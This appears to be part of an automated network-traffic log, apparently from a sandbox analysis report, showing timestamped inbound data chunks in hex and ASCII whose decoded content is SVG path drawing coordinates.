                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6597INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                  Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6613INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                  Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6629INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                                                                                                  Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6645INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                                                                                                  Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6661INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                                                                                                  Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6677INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                  Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6693INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                  Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6709INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                  Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6725INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                  Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6741INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                                                                                                  Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6757INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                  Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6773INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6789INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6805INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                  Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6821INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                  Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6837INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                                                                                                  Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                  2023-07-27 19:54:37 UTC6853INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                  Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
